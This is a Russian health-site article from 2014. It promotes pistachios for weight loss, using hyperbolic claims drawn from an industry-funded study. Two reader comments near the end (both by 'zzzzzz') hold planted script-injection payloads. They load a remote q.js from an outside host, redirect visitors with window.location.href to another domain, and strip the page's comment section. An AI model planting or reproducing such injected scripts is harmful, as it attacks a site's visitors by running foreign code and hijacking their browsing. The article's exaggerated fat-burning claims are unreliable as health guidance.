Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Перекус, который заставит...  >>  Перекус, который заставит вас купить штаны на размер меньше в Новом году
 
Обратная связь
 

Перекус, который заставит вас купить штаны на размер меньше в Новом году

Размер шрифта
19 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили, что фисташки сжигают жир на ваших боках, как пламя – бумагу.

Вам придется купить штаны на размер меньше, если вы будете есть этот перекус!

В исследовании приняли участие 60 пациентов среднего возраста с повышенным риском развития сахарного диабета и ишемической болезни сердца. Они были разделены на две группы, различающиеся по рациону питания. Счастливчики из первой группы должны были кушать фисташки, при этом 20% всех калорий они получали именно из орехов. В рационе второй группы – контрольной – фисташки отсутствовали.

Что же в итоге? Во-первых, у пациентов разительно отличался баланс питательных веществ: «фисташковая диета» содержала больше белка (20% против 15%) и меньше углеводов (51% против 60%).

И эффект не заставил себя ждать: спустя шесть месяцев наблюдения у пациентов из первой группы отмечалось снижение охвата талии (примерно на 2 сантиметра) и улучшение липидного и углеводного профилей плазмы. Кроме того, у них были в меньшей степени выражены проявления системной воспалительной реакции.

«Фисташки – продукт с уникальными свойствами», – рассказывает доктор Сима Гулати, глава исследовательской группы, директор Национального центра по исследованию сахарного диабета, ожирения и нарушений обмена веществ (Индия). «Во-первых, в них содержится целая бездна мононенасыщенных жирных кислот, которые помогают снижать уровень холестерина крови. Кроме того, эти полезные жиры увеличивают продукцию гормонов, которые регулируют обмен глюкозы и стимулируют выброс инсулина, что в итоге приводит к снижению уровня сахара в крови. И самое главное – мононенасыщенные жирные кислоты снижают массу внутрибрюшного жира!»

Впрочем, нельзя не отметить тот факт, что авторы были объективны не на 100%, поскольку исследование финансировалось компанией Paramount Farms, Inc – ведущим поставщиком фисташек в Калифорнии. Впрочем, не стоит думать, что это была проплаченная «липа» – исследование имело очень серьезный дизайн и статистическую обработку; кроме того, позитивные эффекты фисташек были описаны и в ряде предыдущих работ. Так, совсем недавно ученые из Гарвардского университета опубликовали результаты исследования, которые свидетельствуют о том, что фисташковая диета снижает риск смертности на 20%.

Поэтому смело ешьте фисташки, если ходите похудеть! Только выбирайте несоленый продукт, иначе вся польза будет сведена к нулю.

Ну и, конечно, не стоит забывать, что только лишь с помощью орешков обрести осиную талию не удастся. Необходимы глобальные изменения в системе питания. Звучит страшно и сложно? Не волнуйтесь – благодаря «Диете Елены Малышевой» этот процесс стал проще и приятнее, чем когда бы то ни было.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

21 июня 2014 в 15:05

Комментарий удален за нарушение Правил общения

2 - bojera

05 июля 2014 в 14:46

Комментарий удален за нарушение Правил общения

3 - zzzzzz

30 июня 2015 в 18:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Выключите компьютер! Из-за него вы толстеете!   Диета по группе крови – полный обман! Как реально похудеть?   Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
Худшие советы для похудения. Часть 3
Как лишний вес влияет на ваши ноги и их красоту
Стали ли вы жертвой худших советов для похудения?

Тесты

1
Правильно ли вы худеете?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.